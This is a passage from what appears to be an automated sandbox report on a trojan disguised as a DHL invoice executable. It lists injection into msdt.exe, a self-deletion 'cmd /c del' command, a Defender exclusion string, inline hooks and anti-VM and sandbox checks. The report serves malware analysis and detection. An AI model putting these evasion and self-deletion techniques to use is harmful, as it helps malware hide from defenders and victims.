          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0494A710 NtOpenProcessToken,11_2_0494A710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949B00 NtSetValueKey,11_2_04949B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949730 NtQueryVirtualMemory,11_2_04949730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949770 NtSetInformationFile,11_2_04949770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0494A770 NtOpenThread,11_2_0494A770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949760 NtOpenProcess,11_2_04949760
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071A360 NtCreateFile,11_2_0071A360
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071A410 NtReadFile,11_2_0071A410
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071A490 NtClose,11_2_0071A490
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071A540 NtAllocateVirtualMemory,11_2_0071A540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071A40A NtReadFile,11_2_0071A40A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071A53C NtAllocateVirtualMemory,11_2_0071A53C
          Source: invoice dhl.delivery document and original invoice sign.exeBinary or memory string: OriginalFilename vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.366898086.0000000005B80000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000000.348349236.00000000004E2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCMSFILEWRITABLETY.exe4 vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dllF vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exeBinary or memory string: OriginalFilename vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000000.358229484.0000000000992000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCMSFILEWRITABLETY.exe4 vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.438653461.00000000033D0000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437873001.00000000016EF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437330999.000000000155F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000003.361549231.0000000001116000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exeBinary or memory string: OriginalFilenameCMSFILEWRITABLETY.exe4 vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: invoice dhl.delivery document and original invoice sign.exeReversingLabs: Detection: 28%
          Source: invoice dhl.delivery document and original invoice sign.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess created: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess created: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\invoice dhl.delivery document and original invoice sign.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@2/1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_01
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmpBinary or memory string: .SlnpI3O)
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmpBinary or memory string: .Slnp
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: invoice dhl.delivery document and original invoice sign.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: invoice dhl.delivery document and original invoice sign.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.438653461.00000000033D0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000003.361108586.0000000001000000.00000004.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437330999.000000000155F000.00000040.00000001.sdmp, msdt.exe, 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp, msdt.exe, 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: invoice dhl.delivery document and original invoice sign.exe, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000003.361108586.0000000001000000.00000004.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437330999.000000000155F000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp, msdt.exe, 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdb source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.438653461.00000000033D0000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: invoice dhl.delivery document and original invoice sign.exe, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.invoice dhl.delivery document and original invoice sign.exe.4e0000.0.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.invoice dhl.delivery document and original invoice sign.exe.4e0000.0.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.1.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.2.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.9.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.0.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.990000.1.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.7.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.3.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.5.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 0_2_004E2855 push ds; ret 0_2_004E32A7
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 0_2_004E322B push ds; ret 0_2_004E32A7
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041685A push C1F93286h; ret 3_2_0041685F
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041D4B5 push eax; ret 3_2_0041D508
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041D56C push eax; ret 3_2_0041D572
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041D502 push eax; ret 3_2_0041D508
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041D50B push eax; ret 3_2_0041D572
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041660F push ss; retf 3_2_00416624
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0040B75A push esp; retf 3_2_0040B75C
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_00992855 push ds; ret 3_2_009932A7
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0099322B push ds; ret 3_2_009932A7
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014BD0D1 push ecx; ret 3_2_014BD0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0495D0D1 push ecx; ret 11_2_0495D0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071685A push C1F93286h; ret 11_2_0071685F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071D4B5 push eax; ret 11_2_0071D508
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071D56C push eax; ret 11_2_0071D572
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071D502 push eax; ret 11_2_0071D508
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071D50B push eax; ret 11_2_0071D572
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071660F push ss; retf 11_2_00716624
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0070B75A push esp; retf 11_2_0070B75C
          Source: initial sampleStatic PE information: section name: .text entropy: 7.80084963355
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeFile created: \invoice dhl.delivery document and original invoice sign.exe
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeFile created: \invoice dhl.delivery document and original invoice sign.exeJump to behavior

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE1
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"Jump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.363236510.00000000028A6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: invoice dhl.delivery document and original invoice sign.exe PID: 3452, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363236510.00000000028A6000.00000004.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363236510.00000000028A6000.00000004.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000709904 second address: 000000000070990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000709B7E second address: 0000000000709B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe TID: 3576Thread sleep time: -40062s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe TID: 5916Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6932Thread sleep time: -38000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_00409AB0 rdtsc 3_2_00409AB0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeThread delayed: delay time: 40062Jump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000005.00000000.374553794.00000000083E8000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000000.403668866.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.388071286.0000000006420000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000005.00000000.374553794.00000000083E8000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.388071286.0000000006420000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.390916923.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.390916923.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.403668866.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000005.00000000.365143157.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_00409AB0 rdtsc 3_2_00409AB0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148B944 mov eax, dword ptr fs:[00000030h]3_2_0148B944
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148B944 mov eax, dword ptr fs:[00000030h]3_2_0148B944
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146C962 mov eax, dword ptr fs:[00000030h]3_2_0146C962
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146B171 mov eax, dword ptr fs:[00000030h]3_2_0146B171
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146B171 mov eax, dword ptr fs:[00000030h]3_2_0146B171
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469100 mov eax, dword ptr fs:[00000030h]3_2_01469100
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469100 mov eax, dword ptr fs:[00000030h]3_2_01469100
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469100 mov eax, dword ptr fs:[00000030h]3_2_01469100
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01484120 mov eax, dword ptr fs:[00000030h]3_2_01484120
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01484120 mov eax, dword ptr fs:[00000030h]3_2_01484120
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01484120 mov eax, dword ptr fs:[00000030h]3_2_01484120
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01484120 mov eax, dword ptr fs:[00000030h]3_2_01484120
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01484120 mov ecx, dword ptr fs:[00000030h]3_2_01484120
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149513A mov eax, dword ptr fs:[00000030h]3_2_0149513A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149513A mov eax, dword ptr fs:[00000030h]3_2_0149513A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014F41E8 mov eax, dword ptr fs:[00000030h]3_2_014F41E8
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146B1E1 mov eax, dword ptr fs:[00000030h]3_2_0146B1E1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146B1E1 mov eax, dword ptr fs:[00000030h]3_2_0146B1E1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146B1E1 mov eax, dword ptr fs:[00000030h]3_2_0146B1E1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148C182 mov eax, dword ptr fs:[00000030h]3_2_0148C182
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149A185 mov eax, dword ptr fs:[00000030h]3_2_0149A185
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492990 mov eax, dword ptr fs:[00000030h]3_2_01492990
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E69A6 mov eax, dword ptr fs:[00000030h]3_2_014E69A6
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014961A0 mov eax, dword ptr fs:[00000030h]3_2_014961A0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014961A0 mov eax, dword ptr fs:[00000030h]3_2_014961A0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E51BE mov eax, dword ptr fs:[00000030h]3_2_014E51BE
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E51BE mov eax, dword ptr fs:[00000030h]3_2_014E51BE
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E51BE mov eax, dword ptr fs:[00000030h]3_2_014E51BE
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E51BE mov eax, dword ptr fs:[00000030h]3_2_014E51BE
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015249A4 mov eax, dword ptr fs:[00000030h]3_2_015249A4
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015249A4 mov eax, dword ptr fs:[00000030h]3_2_015249A4
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015249A4 mov eax, dword ptr fs:[00000030h]3_2_015249A4
